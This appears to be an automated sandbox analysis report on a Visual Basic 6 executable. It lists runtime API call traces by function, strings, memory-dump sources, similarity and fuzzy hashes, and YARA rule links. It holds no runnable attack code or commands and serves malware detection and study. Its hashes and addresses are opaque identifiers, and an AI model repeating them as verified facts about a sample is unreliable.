__vbaHresultCheckObj.MSVBVM60(00000000,72A26C4A,004098D4,00000154,?,00000000), ref: 00423389
__vbaHresultCheckObj.MSVBVM60(00000000,72A26C4A,004098D4,00000050,?,00000000), ref: 004233AD
__vbaHresultCheckObj.MSVBVM60(00000000,72A26C4A,004098D4,000000E0,?,00000000), ref: 004233E3
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,00000000,00000000,00000003,?,00000000), ref: 00423409
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000264,?,00000000), ref: 0042343E
__vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 00423450
__vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000002,00000003,00000000,?,00000000,?,00000000), ref: 00423478
__vbaI2I4.MSVBVM60 ref: 0042348C
__vbaI2I4.MSVBVM60 ref: 004234BF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000284), ref: 0042354C
__vbaI2I4.MSVBVM60(?,?), ref: 00423574
__vbaI2I4.MSVBVM60(?,?), ref: 00423592
__vbaI2I4.MSVBVM60(?,?), ref: 004235B0
#537.MSVBVM60(00000000,?), ref: 004235F6
__vbaStrMove.MSVBVM60 ref: 00423600
__vbaStrCat.MSVBVM60(00000000), ref: 00423603
__vbaStrMove.MSVBVM60 ref: 0042360D
#537.MSVBVM60(00000000,00000000), ref: 00423612
__vbaStrMove.MSVBVM60 ref: 0042361C
__vbaStrCat.MSVBVM60(00000000), ref: 0042361F
__vbaStrMove.MSVBVM60 ref: 00423629
#537.MSVBVM60(00000000,00000000), ref: 0042362E
__vbaStrMove.MSVBVM60 ref: 00423638
__vbaStrCat.MSVBVM60(00000000), ref: 0042363B
__vbaStrMove.MSVBVM60 ref: 00423645
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0042366C
#537.MSVBVM60(?,?), ref: 00423695
__vbaStrMove.MSVBVM60 ref: 0042369F
__vbaStrCat.MSVBVM60(00000000), ref: 004236A2
__vbaStrMove.MSVBVM60 ref: 004236AC
#537.MSVBVM60(?,00000000), ref: 004236B7
__vbaStrMove.MSVBVM60 ref: 004236C1
__vbaStrCat.MSVBVM60(00000000), ref: 004236C4
__vbaStrMove.MSVBVM60 ref: 004236CE
#537.MSVBVM60(?,00000000), ref: 004236D9
__vbaStrMove.MSVBVM60 ref: 004236E3
__vbaStrCat.MSVBVM60(00000000), ref: 004236E6
__vbaStrMove.MSVBVM60 ref: 004236F0
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00423717
__vbaI2I4.MSVBVM60 ref: 00423774
__vbaGenerateBoundsError.MSVBVM60 ref: 004237C7
__vbaGenerateBoundsError.MSVBVM60 ref: 004237DF
__vbaGenerateBoundsError.MSVBVM60 ref: 004237FF
__vbaStrCopy.MSVBVM60 ref: 00423812
__vbaI2I4.MSVBVM60 ref: 00423856
__vbaI2I4.MSVBVM60 ref: 00423888
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000284), ref: 0042390C
__vbaGenerateBoundsError.MSVBVM60 ref: 00423950
_adj_fdiv_m64.MSVBVM60 ref: 00423985
__vbaR8IntI4.MSVBVM60 ref: 00423994
__vbaGenerateBoundsError.MSVBVM60 ref: 004239A7
__vbaGenerateBoundsError.MSVBVM60 ref: 004239CD
__vbaStrCmp.MSVBVM60(0040A0E4,00000000), ref: 004239DE
__vbaGenerateBoundsError.MSVBVM60 ref: 00423A15
_adj_fdiv_m64.MSVBVM60 ref: 00423A46
__vbaR8IntI4.MSVBVM60 ref: 00423A55
__vbaGenerateBoundsError.MSVBVM60 ref: 00423A68
__vbaGenerateBoundsError.MSVBVM60 ref: 00423A88
__vbaStrCopy.MSVBVM60 ref: 00423A97
__vbaGenerateBoundsError.MSVBVM60 ref: 00423AC6
_adj_fdiv_m64.MSVBVM60 ref: 00423AF7
__vbaR8IntI4.MSVBVM60 ref: 00423B06
__vbaGenerateBoundsError.MSVBVM60 ref: 00423B19
__vbaGenerateBoundsError.MSVBVM60 ref: 00423B39
__vbaGenerateBoundsError.MSVBVM60 ref: 00423B6A
_adj_fdiv_m64.MSVBVM60 ref: 00423B9F
__vbaR8IntI4.MSVBVM60 ref: 00423BAE
__vbaGenerateBoundsError.MSVBVM60 ref: 00423BC5
__vbaGenerateBoundsError.MSVBVM60 ref: 00423BF8
__vbaGenerateBoundsError.MSVBVM60 ref: 00423C40
_adj_fdiv_m64.MSVBVM60 ref: 00423C75
__vbaR8IntI4.MSVBVM60 ref: 00423C84
__vbaGenerateBoundsError.MSVBVM60 ref: 00423C97
__vbaGenerateBoundsError.MSVBVM60 ref: 00423CBD
__vbaStrCmp.MSVBVM60(0040A0E4,00000000), ref: 00423CCE
__vbaGenerateBoundsError.MSVBVM60 ref: 00423D05
_adj_fdiv_m64.MSVBVM60 ref: 00423D36
__vbaR8IntI4.MSVBVM60 ref: 00423D45
__vbaGenerateBoundsError.MSVBVM60 ref: 00423D58
__vbaGenerateBoundsError.MSVBVM60 ref: 00423D78
__vbaStrCopy.MSVBVM60 ref: 00423D87
__vbaGenerateBoundsError.MSVBVM60 ref: 00423DB6
_adj_fdiv_m64.MSVBVM60 ref: 00423DE7
__vbaR8IntI4.MSVBVM60 ref: 00423DF6
__vbaGenerateBoundsError.MSVBVM60 ref: 00423E09
__vbaGenerateBoundsError.MSVBVM60 ref: 00423E29
__vbaGenerateBoundsError.MSVBVM60 ref: 00423E5A
_adj_fdiv_m64.MSVBVM60 ref: 00423E8F
__vbaR8IntI4.MSVBVM60 ref: 00423E9E
__vbaGenerateBoundsError.MSVBVM60 ref: 00423EB5
__vbaGenerateBoundsError.MSVBVM60 ref: 00423ED3
__vbaStrCat.MSVBVM60(0040886C,00000000), ref: 00423EF0
__vbaStrMove.MSVBVM60 ref: 00423EFA
__vbaStrCopy.MSVBVM60 ref: 00423F06
__vbaFreeStr.MSVBVM60 ref: 00423F12
__vbaI2I4.MSVBVM60 ref: 00423F6A
__vbaGenerateBoundsError.MSVBVM60 ref: 00423FB9
__vbaGenerateBoundsError.MSVBVM60 ref: 00423FD1
__vbaGenerateBoundsError.MSVBVM60 ref: 00423FED
__vbaStrCmp.MSVBVM60(0040A0E4,00000000), ref: 00424002
__vbaGenerateBoundsError.MSVBVM60 ref: 00424035
__vbaGenerateBoundsError.MSVBVM60 ref: 0042404D
__vbaGenerateBoundsError.MSVBVM60 ref: 00424069
#537.MSVBVM60(?,?), ref: 00424089
__vbaStrMove.MSVBVM60(?,?), ref: 00424097
__vbaStrCat.MSVBVM60(00000000,?,?), ref: 0042409A
__vbaStrMove.MSVBVM60(?,?), ref: 004240A4
__vbaFreeStr.MSVBVM60(?,?), ref: 004240AC
__vbaStrCat.MSVBVM60(?,?), ref: 00424100
__vbaStrMove.MSVBVM60 ref: 0042410A
#537.MSVBVM60(00000000), ref: 0042410E
_adj_fdiv_m64.MSVBVM60(00000008,?), ref: 00424187
__vbaLenBstr.MSVBVM60(?,00000008,?), ref: 004241B2
__vbaFpI4.MSVBVM60(?,00000008,?), ref: 004241E0
#606.MSVBVM60(00000000,?,00000008,?), ref: 004241ED
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004241F7
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004241FA
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424204
__vbaFreeStr.MSVBVM60(?,00000008,?), ref: 0042420C
__vbaFreeVar.MSVBVM60(?,00000008,?), ref: 00424218
#537.MSVBVM60(00000000,?,00000008,?), ref: 0042422A
#537.MSVBVM60(00000000,?,00000008,?), ref: 00424242
#537.MSVBVM60(00000000,?,00000008,?), ref: 0042425A
#537.MSVBVM60(00000000,?,00000008,?), ref: 00424272
#537.MSVBVM60(00000000,?,00000008,?), ref: 0042428A
#537.MSVBVM60(00000000,?,00000008,?), ref: 004242A2
#537.MSVBVM60(00000000,?,00000008,?), ref: 004242BA
#537.MSVBVM60(00000000,?,00000008,?), ref: 004242D2
#537.MSVBVM60(00000000,?,00000008,?), ref: 004242EA
#606.MSVBVM60(00000002,00000008,?,00000008,?), ref: 00424309
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424313
#537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00424318
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424326
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424329
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424333
#537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00424338
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424346
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424349
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424353
#537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 00424358
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424366
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424369
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424373
#537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 00424378
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424386
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424389
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424393
#537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 00424398
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243A6
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004243A9
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243B3
#537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 004243B8
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243C6
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004243C9
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243D3
#606.MSVBVM60(00000006,00000008,00000000,?,00000008,?), ref: 004243DF
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243E9
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004243EC
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004243F6
#581.MSVBVM60(&H68,00000000,?,00000008,?), ref: 004243FE
__vbaFpI4.MSVBVM60(?,00000008,?), ref: 00424404
#537.MSVBVM60(00000000,?,00000008,?), ref: 0042440B
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424419
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042441C
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424426
#537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 0042442B
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424439
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042443C
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424446
#606.MSVBVM60(00000002,00000008,00000000,?,00000008,?), ref: 00424452
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042445C
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042445F
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424469
#537.MSVBVM60(00000016,00000000,?,00000008,?), ref: 0042446E
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042447C
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042447F
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424489
#606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 00424495
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042449F
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004244A2
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244AC
#537.MSVBVM60(00000028,00000000,?,00000008,?), ref: 004244B1
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244BF
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004244C2
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244CC
#606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 004244D8
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244E2
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004244E5
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004244EF
#537.MSVBVM60(00000010,00000000,?,00000008,?), ref: 004244F4
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424502
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424505
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042450F
#606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 0042451B
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424525
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424528
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424532
#537.MSVBVM60(00000020,00000000,?,00000008,?), ref: 00424537
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424545
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424548
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424552
#606.MSVBVM60(00000003,00000008,00000000,?,00000008,?), ref: 0042455E
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424568
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042456B
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424575
#537.MSVBVM60(00000001,00000000,?,00000008,?), ref: 0042457A
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424588
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042458B
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424595
#537.MSVBVM60(00000000,00000000,?,00000008,?), ref: 0042459A
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245A8
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004245AB
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245B5
#537.MSVBVM60(00000018,00000000,?,00000008,?), ref: 004245BA
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245C8
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004245CB
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245D5
#606.MSVBVM60(00000005,00000008,00000000,?,00000008,?), ref: 004245E1
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245EB
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004245EE
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 004245F8
#537.MSVBVM60(00000040,00000000,?,00000008,?), ref: 004245FD
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042460B
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042460E
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424618
#537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 0042461D
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042462B
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 0042462E
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00424638
#606.MSVBVM60(00000012,00000008,00000000,?,00000008,?), ref: 00424644
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042464E
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00424651
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042465B
__vbaStrCat.MSVBVM60(?,00000000,?,00000008,?), ref: 00424665
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 0042466F
__vbaFreeStrList.MSVBVM60(00000033,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004247D8
__vbaFreeVarList.MSVBVM60(00000009,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,?,00000008,?), ref: 0042481F
#648.MSVBVM60(0000000A), ref: 00424E2A
__vbaFreeVar.MSVBVM60 ref: 00424E3C
__vbaI2I4.MSVBVM60(?), ref: 00424E4E
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00424E58
__vbaI2I4.MSVBVM60 ref: 00424E60
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00424E6C
__vbaI2I4.MSVBVM60 ref: 00424E74
__vbaFileClose.MSVBVM60(00000000), ref: 00424E77
__vbaExitProc.MSVBVM60 ref: 00424E87
__vbaAryDestruct.MSVBVM60(00000000,?,004250AB,?,00000000), ref: 00425084
__vbaFreeStr.MSVBVM60(?,00000000), ref: 00425093
__vbaFreeStr.MSVBVM60(?,00000000), ref: 00425098
__vbaFreeStr.MSVBVM60(?,00000000), ref: 004250A0
__vbaFreeStr.MSVBVM60(?,00000000), ref: 004250A8
__vbaErrorOverflow.MSVBVM60(?,00000000), ref: 004250CA

Strings

&H68, xrefs: 004243F9
x.@, xrefs: 00423282, 004232D7, 004238A9, 004234E5
, xrefs: 00424830
&HA8, xrefs: 00424A0B

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$#537$BoundsGenerate$Free$#606CheckHresult$_adj_fdiv_m64$AnsiCopy$ListSystem$File$#581#648BstrCloseDestructExitOpenOverflowProcPut3RedimUnicode
String ID: $&H68$&HA8$x.@
API String ID: 3305104701-3742186716
Opcode ID: 37f84d4a9c39c7a1c50757bcf0e40db309af58f8b6e847605082b1ec1b3a9c81
Instruction ID: 7b234b66774b24242b66e43e3622a6720749bc198b4922623ead5fbfde0b20dd
Opcode Fuzzy Hash: 37f84d4a9c39c7a1c50757bcf0e40db309af58f8b6e847605082b1ec1b3a9c81
Instruction Fuzzy Hash: E013FA71E002289BCB25DF65DD84ADABBB9FF48301F5081EAE10AA6250DF745F85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041F830, Relevance: 90.6, APIs: 60, Instructions: 579COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(00000000,72A26C30,72A20EBE), ref: 0041F894
__vbaAryConstruct2.MSVBVM60(?,0040A070,00000011), ref: 0041F8A1
__vbaOnError.MSVBVM60(00000001), ref: 0041F8A9
__vbaUbound.MSVBVM60(00000001), ref: 0041F8B7
#648.MSVBVM60(0000000A), ref: 0041F8DB
__vbaFreeVar.MSVBVM60 ref: 0041F8ED
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?), ref: 0041F906
__vbaStrCopy.MSVBVM60 ref: 0041F914

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrMove.MSVBVM60(?), ref: 0041F92A

Part of subcall function 00411210: #594.MSVBVM60(?,72A21A08,-00000001,72A26C30), ref: 0041127A
Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2

__vbaStrMove.MSVBVM60(?), ref: 0041F93A
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 0041F94F
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041F95F
__vbaPut3.MSVBVM60(00000004,?,00000000), ref: 0041F975
__vbaLenBstr.MSVBVM60(00405414), ref: 0041F97C
#648.MSVBVM60(0000000A), ref: 0041F9CC
__vbaFreeVar.MSVBVM60 ref: 0041F9DE
__vbaGenerateBoundsError.MSVBVM60 ref: 0041F9FB
__vbaGenerateBoundsError.MSVBVM60 ref: 0041FA0C
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041FA29
__vbaGenerateBoundsError.MSVBVM60 ref: 0041FA46
__vbaGenerateBoundsError.MSVBVM60 ref: 0041FA57
#709.MSVBVM60(00000000,00406544,000000FF,00000000), ref: 0041FA6E
__vbaGenerateBoundsError.MSVBVM60 ref: 0041FAA5
__vbaGenerateBoundsError.MSVBVM60 ref: 0041FABA
#631.MSVBVM60(00000000,?,0000000A), ref: 0041FAE5
__vbaStrMove.MSVBVM60(?,-00000001,0000000A), ref: 0041FAF2
__vbaFreeVar.MSVBVM60(?,-00000001,0000000A), ref: 0041FAFE
__vbaLenBstr.MSVBVM60(00000000), ref: 0041FB11
#570.MSVBVM60(00000000), ref: 0041FB1F
__vbaPut3.MSVBVM60(00000004,0042C250,00000000), ref: 0041FB3F
__vbaPut3.MSVBVM60(00000000,0042C254,00000000), ref: 0041FB50
__vbaPut3.MSVBVM60(00000004,0042C24C,00000000), ref: 0041FB60
__vbaLenBstr.MSVBVM60(00000000), ref: 0041FB69
__vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FB8E
__vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FB9D
__vbaGenerateBoundsError.MSVBVM60(?,-00000001,0000000A), ref: 0041FBC1
__vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FBCC
__vbaGenerateBoundsError.MSVBVM60 ref: 0041FC36
__vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FCEA
__vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FCFB
__vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FD43
__vbaUI1I2.MSVBVM60(00000FEE), ref: 0041FD55
__vbaGenerateBoundsError.MSVBVM60 ref: 0041FD76
__vbaUI1I2.MSVBVM60 ref: 0041FDAA
__vbaUI1I2.MSVBVM60 ref: 0041FDD8
__vbaGenerateBoundsError.MSVBVM60 ref: 0041FE02
__vbaUI1I2.MSVBVM60 ref: 0041FE41
__vbaUI1I2.MSVBVM60 ref: 0041FE4D
__vbaGenerateBoundsError.MSVBVM60(-00000001,00000FED,00000000), ref: 0041FEAB
__vbaGenerateBoundsError.MSVBVM60(00000000), ref: 0041FEE3
__vbaGenerateBoundsError.MSVBVM60 ref: 0041FFDF
__vbaFileClose.MSVBVM60(00000000), ref: 00420025
__vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0042003A
__vbaPut3.MSVBVM60(00000004,0042C24C,00000000), ref: 0042004A
__vbaFileSeek.MSVBVM60(-0042C250,00000000), ref: 00420070
__vbaFileClose.MSVBVM60(00000000), ref: 00420095
__vbaExitProc.MSVBVM60 ref: 004200A2
__vbaFreeStr.MSVBVM60(00420142), ref: 00420123
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042013B
__vbaErrorOverflow.MSVBVM60 ref: 00420159

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$BoundsGenerate$Free$FileMovePut3$Bstr$#631$#516$#648CloseCopyOpenSeek$#570#594#709Construct2DestructExitListOverflowProcUbound
String ID:
API String ID: 380034392-0
Opcode ID: db36c0f1733d6b656f6f0f21110ea2e54cb1fc60724d0d05d8831d20435b8e45
Instruction ID: 84537c48718631c5227d11dd853d148d1c88204475b6f264efbcfc593f9f6461
Opcode Fuzzy Hash: db36c0f1733d6b656f6f0f21110ea2e54cb1fc60724d0d05d8831d20435b8e45
Instruction Fuzzy Hash: 2332CE35A00255CFCB249FA4E8857EDBBB1FF48340F54417AE405A7362DB7898C6CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004172E5, Relevance: 67.9, APIs: 45, Instructions: 372COMMON

Download Yara Rule

APIs

__vbaLenBstr.MSVBVM60(00000000), ref: 004172EC
#631.MSVBVM60(00000000,-00000001,?), ref: 0041731F
__vbaFreeStr.MSVBVM60 ref: 00417340
__vbaFreeVar.MSVBVM60 ref: 00417349
#616.MSVBVM60(00000000,00000000), ref: 00417370
#631.MSVBVM60(00000000,-00000003,0000000A,00000000), ref: 00417399
#616.MSVBVM60(00000000,00000000), ref: 004173C9
#631.MSVBVM60(00000000,-00000002,0000000A,00000000), ref: 004173F1
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00417414
__vbaFreeVar.MSVBVM60 ref: 00417420
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$Error$#631System$#616ListUnlock$BoundsBstrGenerate$CopyLockOverflow
String ID:
API String ID: 1595817071-0
Opcode ID: fb2a2bfa88c22efa9ac14300410e64a9e07382cf4d2ae5499a4c189e4441db04
Instruction ID: 643dac4b4df38dfcdabcb7d24b6f5cff0a220186fca35a0c0bc2019b66c0cc28
Opcode Fuzzy Hash: fb2a2bfa88c22efa9ac14300410e64a9e07382cf4d2ae5499a4c189e4441db04
Instruction Fuzzy Hash: 78E119B0E002189BDB14DFA5DD84AEEBBB9FF48300F50856EE50AE7250DB745986CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041725A, Relevance: 58.8, APIs: 39, Instructions: 312COMMON

Download Yara Rule

APIs

__vbaLenBstr.MSVBVM60(00000000), ref: 00417261
#631.MSVBVM60(00000000,-00000001,?), ref: 00417294
__vbaFreeStr.MSVBVM60 ref: 004172B5
__vbaFreeVar.MSVBVM60 ref: 004172BE
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
